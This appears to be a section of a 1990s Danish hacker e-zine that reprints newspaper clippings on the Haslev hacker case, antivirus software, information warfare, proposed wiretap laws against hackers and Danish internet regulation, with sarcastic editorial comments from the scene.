ComputerWorld - 17. November 1995 Af Clive Sharp Fors›g p† at bryde n›gler til krypterede dokumenter i stor hackersag er indtil videre endt uden resultat. Efterforskningen i den store hackersag, ogs† kendt under navnet Haslev- sagen, st†r i stampe p† vigtige omr†der, fordi politiet indtil videre ikke har v‘ret i stand til at bryde koderne til en r‘kke krypterede filer p† de sigtedes harddiske. Vicekriminalkommiss‘r Preben Andersen fra Rigspolitiets Rejsehold oplyser overfor ComputerWorld, at de sigtede hackere generelt har krypteret deres diske, og at det ikke er lykkedes politiet at kn‘kke koderne ved at tr‘- kke p† hj‘lp fra "g‘ngse ressourcer". KAPLB MED TIDEN. - Problemet er beklageligvis, at det jo ikke er til at bryde det skidt. De instanser, der skulle hj‘lpe os og som skulle have ekspertisen, har meldt fra. Vi satser dog fortsat p†, at det skal lykkes og i ›jeblikket arbejder vi med en partner, der fors›ger at kn‘kke koderne efter et nyt koncept, siger Preben Andersen. Politiet har ikke tidligere villet oplyse, om der var fundet krypterede filer p† de sigtedes harddiske eller ej. Efter en af de sigtede i sagen for et par uger siden stod offentligt frem og fortalte, at han havde hentet krypteringsprogrammer p† Internet og sikret en del af filerne p† sin computer, indr›mmer politiet imidlertid, at hackerne generelt har benyttet krypterings-programmer, og at hackerne har v‘ret koldblodige nok til at lade v‘re med at give politiet de n›gler, der kunne dekryptere en r‘kke filer. Politiets fors›g p† at dekryptere dokumenter fra hackernes harddiske er i en vis udstr‘kning et kapl›b med tiden. Forel›big har opklaringsarbejdet st†et p† i over to †r og sagerne ventes i ›jeblikket tidligst at kunne blive berammet til engang i l›bet af f›rste eller andet kvartal i 1996. Politiets tidsproblem er, at alt for langstrakt politiarbejde vil tr‘kke i retning af mildere afg›relser. P† den anden side vil det v‘re af is‘r stor politisk v‘rdi for politiet at kn‘kke koderne p† grund af det signal, man dermed vil sende hacker-milj›et. -------- Det eneste "signal" man vil sende hackermilj›et er, at vi skal finde nogle st‘rkere krypteringsprogrammer (hvis de alts† bliver kn‘kket). Virus fra Internet i karant‘ne Politiken - 14. December 1995 Af Clive Sharp Computervirus er en del af livet i cyberspace. Men s†dan beh›ver det ikke at v‘re. Anti-virus-firmaet McAfee, hvis virusudrydningsv‘rkt›jer [man tror at det er l›gn] er v‘rdsat af alle computerbrugere over den ganske klode [NOT!], har udviklet et nyt beskyttelsesprogram, som s›rger for, at downloadede filer kommer i "karant‘ne", indtil de er blevet forsvarligt set efter i s›mm- ene for virus. Produktet hedder WebScan og kan genkende mere end 6.000 forskel- lige computervira. B†de de klassiske og de nye ondsindede makro-vira, der blandt andet gemmer sig i Word-dokumenter. Desuden kan WebScan unders›ge kom- primerede filer i de fleste anvendte pakkeformater. Interesserede kan hente sig en testversion fra blandt andet DanaDatas BBS p† telefon 86 78 31 34 eller p† Web-adressen http://www.macafee.com. Priserne for den registrerede version af produktet er for private 580 kroner for et †rs abonnement, mens virksomheder m† af med 4.800 kroner for en to-†rig 10-brugerlicens. Priserne er inklusive opdateringer. Den elektroniske akillesh‘l ComputerWorld, Christian Harbou - 15. December 1995 Af Clive Sharp Et hvilkent som helst samfund er ikke mere end tre m†ltider mad fra en revolution. Kommer der ikke f›devarer ud i butikkerne i tre eller flere dage, vil samfundet opleve massive sociale uroligheder. Folk vil give sig til at overfalde og udplyndre hinanden for simpelthen at f† mad p† middagsbordet. Der er derfor en vis mening i at se p†, hvilken trusler mod forsynings- sikkerhende, der gemmer sig i et moderne samfund. Slagtekyllinger i fryseren, telefonforbindelser ud af huset og nyheder p† tv er nogle af de goder, som det moderne menneske tager fuldst‘ndigt givet. Men forsyningerne af stort set alle moderne forn›denheder viser sig ved n‘rmere eftersyn at bero p† en ganske best- emt parameter - nemlig brugen af edb. Edb-systemerne udg›r samfundets akilles- h‘l. Hvis blot et par af de helt store og f›lsomme edb-systemer g†r ned, kan det s‘tte hele samfundet i st†. Lufttrafikken er afh‘ngig af computere. Beta- lingssystemer bygger p† computere. Selv bryggeriernes returflaskesystem er bas- eret p† computere og ville bryde sammen, hvis computerne holdt op med at fung- ere. If›lge direkt›r i Instituttet for Datasikkerhed, Jan [S›nderbo] Carlsen, stiger afh‘ngigheden og dermed f›lsomheden over for fejl i computersystemerne, med samme fart som systemerne udbygges. Men indtil videre har det ikke vundet geh›r rent politisk, at udbygningen af computersystemerne skaber en sikkerheds- m‘ssig risiko for befolkningen. -Man kunne forestille sig en lammelse af store betalingssystemer. For eksempel postgiroen, der †rligt formidler betalinger til en v‘rdi af mange, mange milliarder kroner. Eller man kunne forestille sig eff- ekten af en lammelse af SWIFT-systemet, der formidler alle betalinger til og fra udlandet. Med lammede betalingssystemer ville for eksempel distributionen af ganske almindelige dagligvarer hurtigt g† i st†, oplyser Jan [S›nderbo] Carlsen og tilf›jer: - I Danmark har vi m‘rkeligt nok aldrig f†et gennemf›rt en s†rbarhedsanalyse. Svenskerne og nordm‘ndene har tidligere lavet s†rbarhedsana- lyser, der ganske vist mest gik p† forsyningssikkerheden. Formanden for reger- ingens IT-sikkerhedspolitiske udvalg, Mads Bryde Andersen, er enig i, at en s†rbarhedsanalyse b›r gennemf›res. - Det vil v‘re et naturligt emne for IT- sikkerhedsr†det, dog ikke p† det f›rste m›de. Der er i forvejen utallige emner, der melder sig. Hvis vi begyndte med at interressere os for s†rbarheden i de civile systemer, ville det svare til, at folk, der tager sig af f‘rdselssikker- heden, gav sig til at se p† risikoen for, at der blev smidt en bombe midt p† motorvejen i stedet for at se p† sp›rgsm†l om bremser og sikkerhedsseler, siger Mads Bryde Andersen. S†rbarheden af computersystemerne opst†r, fordi de oprindelige systemer elimineres i takt med at computeren overtager arbejdet. Samfundet br‘nder bro- erne bag sig. N†r institutioner g†r over til elektronisk sagsbehandling, er der nemlig ingen grund til at f›re dobbelt administration. Papirer og dokumenter forsvinder, og p† et givet tidspunkt findes der kun elektronikken og det f‘lles net. Den situation har skabt to nye opgaver for den moderne efterretningstjen- este. I et land som Danmark vil efterretningstjenesten have en naturlig opgave i at kategorisere og udt‘nke et forsvar for de s‘rligt f›lsomme edb-systemer. Og det vil ikke kun handle om milit‘re installationer, men ogs† om civile. Civile edb-installationer vil for det f›rste udg›re naturlige m†l for fjendt- lige angreb i den periode, der ligger forud for en egentlig krise. Men ogs† efter udbrudet af en krig vil civile edb-systemer v‘re i s›gelyset. Det vil nemlig ikke nytte noget at have F-16 jagere i luften og Tiger-tanks p† jorden, hvis befolkningen sl†s i gaderne for at skaffe sig det allermest n›dvendige [Tiger-tanks???? Jeg er bange for, at den k‘re Christian Harbou ikke ved s† meget om det milit‘re system. Tiger-"tanken" var en "tank" som blev brugt af tyskerne under 2. verdenskrig, og den findes IKKE mere. Idag har det Danske forsvar en Leopard-kampvogn, som er en af verdens bedste kampvogne. Den kommer fra Tyskland og s† hedder det en kampvogn og IKKE en tank -red]. I st›rre lande, eksempelvis i Storbritannien, Frankrig og USA, vil efterretnings- tjenesterne desuden skulle finde metoder til at lamme fjendtligtsindede natio- ners computersystemer [Og hvorfor skal vi s† ikke det i Danmark?? -Red]. De to Danske efterretningstjenester er ikke til at hive oplysninger ud af p† dette felt - fuldst‘ndigt ligesom efterretningstjenesterne var knappet til for blot halvandet †r siden i sp›rgsm†let om de krypterings-teknikker, der en gang for alle har sat tjenesterns aflytningssystemer ud af spil [Men ER de nu sat ud af spillet? Det tror jeg ikke -Red]. Men amerikanske efterretnings- officerer har udtalt offentligt, blandt andet til bladet TIME [Fedt, USA's svar p† Billed-bladet -red], at der forskes i computerkrig, b†de med henblik p† at forsvare sig og med henblik p† at lamme eventuelle fjender. Desuden tr‘kker internationale konferencer om datasikkerhed for tiden deltagere fra efterret- ningstjenesterne til huse. Og fra disse sammenkomster er det ret almindeligt, at der slipper oplysninger ud til civilbefolkningen [Ja, for selvf›lgeligt sidder folkene fra efterretningstjenesterne og diskuterer deres hemmelige pro- jekter med ganske tilf‘ldige civile folk! Eller ogs† g›r de ikke. -red]. En af de mere ber›mte historier, der verserer i ›jeblikket, handler om, at amerikan- erne under Golfkrigen havde held til at lamme dele af Sadam Husseins milit‘r- apparat ved at plante virus eller "orm" i systemerne gennem forudprogrammerede chips, som blev sendt ind i Irak med franskproducerede printere. - Historien om amerikanernes computerangreb p† Irak er helt ubekr‘ftet. Men omvendt ved vi, at det kan lade sig g›re at lamme computersystemer med virus eller s†kaldte worms [Der er sku' forskel p† en virus og en worm -red]. Det bekr‘ftes ikke mindst af historien om den amerikanske antivirus-professor s›n, der lavede en worm, som var i stand til at l‘gge 10.000 Unix-maskiner ned p† en eftermiddag, siger Jan [S›nderbo] Carlsen [Jeg tror ikke at Morris senior er antivirus-pro- fessor, men p‘nt fors›g -red]. - N†r hackere kan finde ud af at bryde ind i vitale edb-installationer, s† m† det uv‘gerligt f† efterretningstjenesterne til at t‘nke, at den samme teknik kan bruges m†lrettet af andre, tilf›jer han. If›lge Jan [S›nderbo] Carlsen vil der typisk v‘re tre metoder til at s‘tte computersystemer ud af drift. Mandskabsm‘ssigt vil det v‘re n‘rliggende at uddanne s‘rlige korps, der er specialiseret i at hacke [EKKMP anyone? -red]. V†benarsenalet vil tillige kunne omfatte s‘rlige EMP-kanoner, alts† v†ben, der retter en st‘rk elektromagnetisk impuls mod et computersystem. If›lge en ar- tikel i TIME fra dette efter†r, kan en EMP-kanon gemmes i en kuffert. Et EMP- bombardement af en computer vil i princippet overfodre systemet med oplysninger som f›rer til at computeren bryder sammen. V†bnet kan affyres b†de lydl›st og usynligt tv‘rs igennem en mur, hvis det skulle v‘re. Endelig er der muligheden, at bestemte nationer benytter sig af at v‘re p† hjemmebane, n†r det handler om computere. -Det vil v‘re n‘rliggende for de lande, der ligger foran i produk- tionen af computere, at indbygge skjulte funktioner i forskellige komponenter, s† det senere kan lade s† g›re at f† kontrol med computersystemerne p† afstand. Det ville i hvert fald v‘re m‘rkeligt, hvis chefer i de amerikanske efterret- ningetjenester ikke i det mindste stillede forslag om at g›re fors›get, siger Jan [S›nderbo] Carlsen. Computerkrigen, hvor et stort, vestligt land angriber en lille nation som Danmark, er nok det mindst sandsynlige scenario af alle. Den version af computerkrig, der helt konkret giver anledning til nerv›sitet, og som har v‘ret beskrevet i den amerikanske presse, handler derimod om fattige nationers angreb p† vestlige landes vitale systemer. En misundelses-krig eller en form for krig, der har til form†l at l‘gge pres p† vestlige lande for even- tuelt at sikre et milit‘rdiktatur fred. - Uddannelsen af s‘rlige hackerkorps koster ikke tiln‘rmelsesvis s† meget som for eksempel udviklingen af atomv†ben. Desuden kan det forg† i det skjulte. En h‘r af hackere, der sendes ud i verden, vil kunne angribe et vestligt land fra alle mulige lokaliteter, uden risiko for at blive sporet og tilintetgjort [Hmmmm hvis en normal hacker kan spores, hvor- for kan en hacker fra forsvaret s† ikke?? -red]. Angrebsvejene er kommunikati- onsforbindelser ind og ud af landene. Og det kan ikke lade sig g›re at lukke ned for telefonforbindelserne, der forbinder et land med omverden, siger Jan [S›nderbo] Carlsen [Hmmm, det virkede da rimeligt godt for USSR, og hvis man har pr›vet at ringe til ex-Jugoslavien de sidste 2-3 †r, s† vil man kunne se, at det ogs† virkede ganske godt der -red]. Hans pointe er, at der vil v‘re god grund til at se p† civile edb-systemers sikkerhed mod angreb. Milit‘re anl‘g er i forvejen klassificeret i forskellige kategorier og s‘rligt vigtige milit‘re anl‘g er sikret mod angreb med elektromagnetiske str†ler. Jan [S›nderbo] Car- lsen ser s†ledes gerne, at civile anl‘g kategoriseres, og at en r‘kke krav til sikkerheden p† et tidspunkt kommer til at udspringe af det enkelte edb-anl‘gs betydning for samfundet. -------- Ham der har skrevet denne artikel er en taber! Han ved intet om intet! Alle hans "h†rde" facts kommer fra TIME, og hvor fedt er det? Det lyder desuden som om at Jan S›nderbo Carlsen har l‘st Information Warfare (anmeldt i dette num- mer), for alt hvad han siger (og mere til) st†r i den bog. H†rdere kurs mod hackere Berlingske Tidende, Henrik Larsen - 21. December 1995 Af Clive Sharp Aflytning: Lovforslag vil give politiet ›get adgang til at telefon- aflytte hackere. God id‚, siger Bagmandspolitiet. Mange firmaer anmelder ikke fors›g p† indbrud i deres EDB-systemer. Fremover skal det v‘re lettere for politiet at telefonaflytte personer, der ved hj‘lp af en hjemmecomputer koblet til telefonnettet pr›ver at skaffe sig adgang til oplysninger i EDB-systemer hos firmaer og institutioner. En elektronisk indbrudsform, der i fagsproget kaldes hacking. Det er et af de cen- trale punkter i et lovforslag, som Justitsministeriet er ved at l‘gge sidste h†nd p†. I sager om hacker-virksomhed vil forslaget oph‘ve den nuv‘rende regel, der siger, at telefonaflytning som udgangspunkt kun kan finde sted ved mistanke om forbrydelser som kan straffes med mindst seks †rs f‘ngsel. Mist‘nkes en per- son for at v‘re hacker, skal politiet efter forslaget fremover kunne f† en dommerkendelse til at aflytte vedkommendes telefon - hvis politiet vel og m‘rke kan sandsynligg›re, at der foreg†r noget ulovligt. Forslaget kommer til behandling i dette folketings†r. Vedtages det, vil politiet langt om l‘nge kunne gribe effektivt ind over for hackere, siger kriminalkommis‘r Henning Jensen, Bagmandspolitiet. "Bliver et firma i dag angrebet af en hacker, giver loven udelukkende os mulighed for at installere et s†kaldt fastholdeanl‘g [nogen der kendet noget til det?]. Det kan spore det nummer, der ringes fra - og s† kan vi naturligvis tage en snak med abonnenten. Problemet er bare, at hackere typisk fors›ger at komme ind i en lang r‘kke for- skellige datasystemer, og den totale aktivitet kan vi kun f† kendskab til ved at aflytte hackernes telefon". Hvor aktive Danske hackere er, har myndighederne ikke noget pr‘cist billede af, siger Henning Jensen. "Siden 1984 har vi haft 15 egentlige sager - hvor flere har drejet sig om tusindvis af fors›g p† at bryde ind i EDB-system- er. Men det reelle problem er langt st›rre end antallet af sager kunne tyde p†. I mange tilf‘lde bliver det bare ikke anmeldt - ofte fordi firmaet v‘lger at lukke hackerne ude ved at installere ekstra sikkerhedsudstyr". --------- Hmmmm, det begynder at se lidt sort ud for os, hvis denne lov kommer igennem. Jeg er is‘r meget interesseret i hvilken kriterier der g‘lder for "... hvis politiet vel og m‘rke kan sandsynligg›re, at der foreg†r noget ulovligt". Udfra dette kan man jo sige, at det er sandsynligt, at alle dem der ringer til et H/P/A/V/C board, er inde i noget ulovligt. Skal de allesammen have aflyttet deres telefon? Denne udvikling bliver sp‘ndende at f›lge. Aflytning af hackere Politiken - 4. Januar 1996 Af Clive Sharp Justitsministeriet er ved at l‘gge sidste h†nd p† et lovforslag, der skal g›re det lettere at aflytte hackernes telefoner. I dag kan politiet kun f† tilladelse til at aflytte telefoner, hvis der er begrundet mistanke om en forbrydelse, som kan give mindst seks †rs f‘ngsel. Men hackernes aktiviteter sk›nnes †benbart at v‘re s† besv‘rlige at efterforske, at Justitsministeriet vil have oph‘vet denne regel. Angreb p† Nettet Politiken - 4. Januar 1996 Af Clive Sharp Under overskriften 'Omfattende angreb p† nettet' advarer Computer Emergency Response Team (CERT), at der inden for det sidste stykke tid er sket en dramatisk stigning i hackingfors›g over Internettet. Og en stor del af for- s›gene er succesfulde. Alle hackingangrebene bruger kendte svagheder i Internet computersystemer - svagheder, der relativt nemt kan rettes, for eksempel ved at opgradere software. De succesrige hackingfors›g giver hackeren fri adgang til alt i systemet. Minister afviser Dansk net-politi Politiken, Michael Berg Larsen - 11. Januar 1996 Af Clive Sharp Forskningsminister Frank Jensen mener ikke, at der er behov for et Dansk net-politi til at efters›ge ulovligheder p† Nettet. I USA debatterer man for tiden voldsomt om Internettet skal p†l‘gges restriktioner. Specielt den amerikanske h›jrefl›j mener, at alt hvad der er anst›deligt p† Nettet, skal forbydes. Endnu er lovforslaget, Communications Decency Act, ikke vedtaget. Fornyligt lukkede den store, amerikanske online-tjeneste CompuServe i panik mere end 200 nyhedsgrupper efter pres fra anklagemyndigheden i Bayern, der var p† jagt efter h†rd porno p† CompuServe. I en lang r‘kke andre lande har man allerede vedtaget love, der begr‘nser ytringsfriheden p† Internettet. Eller ogs† overvejer man det kraftigt. Forskningsminister Frank Jensen mener dog ikke at der er brug for et net-politi i Danmark. Han mener, at den Danske lovgivning er fuldt tilstr‘kkelig til at klare eventuelle ulovligheder med Dansk udspring p† Nettet - uanset om det drejer sig om ophavsretsstridigheder, racistiske yt- ringer eller andre lovstridige informationer. Frank Jensen p†peger endvidere, at vi i Danmark hidtil har v‘ret meget imod at indf›re regler, der smager af censur, og pornografien er jo som bekende frigivet. PERSONLIGT ANSVAR. Samtidig understreger ministeren, at vi i Danmark har en anden opfa- ttelse af det personlige ansvar. Og at han ville have det meget sv‘rt ved at skulle agere smagsdommer og bestemme, hvad der i givet fald skulle forbydes. - Det m† v‘re folks eget ansvar, hvad de v‘lger at enten kigge p† eller l‘se. Og jeg vil g† meget langt i forsvaret for de personlige rettigheder, siger Frank Jensen. -Et s‘rligt problem kan v‘re mindre†riges brug af Internettet, siger ministeren. Frank Jensen mener dog, at det m† v‘re for‘ldrenes ansvar, og at de eventuelt kan sikre computerne med en form for l†s. - Jeg er derfor som udgangspunkt ikke indstillet p† at regulere p† omr†det, f›r der opst†r konkrete problemer, siger ministeren. REKLAMEREGLER. Forskningsministeren har dog i en ny lov om forhold p† telekommunika- tionsomr†det sikret sig mulighed for administravtivt at bestemme, at de regler, der g‘lder for radio og fjernsynsvirksomhed om reklamer og sponsorering, ogs† kan komme til at g‘lde for Internettet. Det vil sige, at der kan komme begr‘ns- ninger, hvis online-tjenesterne enten gengiver reklamer for medicin, spiritus, tobak eller publicerer ekstrem vold og porno, der er i konflikt med Dansk lov- givning. I givet fald vil det v‘re Telestyrelsen, der skal agere Net-politi. Ministeren har dog endnu ikke gjort sig nogle tanker om, hvordan det i praksis skulle g† for sig. - Det er ganske vanskeligt p† forh†nd at sige noget om, hvordan det kunne komme til at foreg†. En endelig udm›ntning m† ske p† baggrund af de eventuelle ulovligheder, der i givet fald m†tte dukke op. Men jeg mener, at vi rent lovgivningsm‘ssigt er kl‘dt godt p†, hvis der skulle blive proble- mer, siger Frank Jensen. INTERNATIONALT SAMARBEJDE. Men den Danske lovgivning r‘kker ikke ud over landets gr‘nser. Og der kan opst† problemer, hvis der for eksempel fra en tysk computer udsendes infor- mationer, der kr‘nker Dansk lovgivning. Forskningsminister Frank Jensen er klar over, at en effektiv begr‘nsning er meget vanskelig at gennemf›re, da Internet- net jo er globalt. Han mener, at det problem kun kan l›ses i internationale fora. - Fra Dansk side er vi meget †bne over for et internationalt samarbejde, og jeg kan sagtens forestille mig, at det inden alt for l‘nge kommer p† dags- ordenen i EU, siger Frank Jensen. ENDEX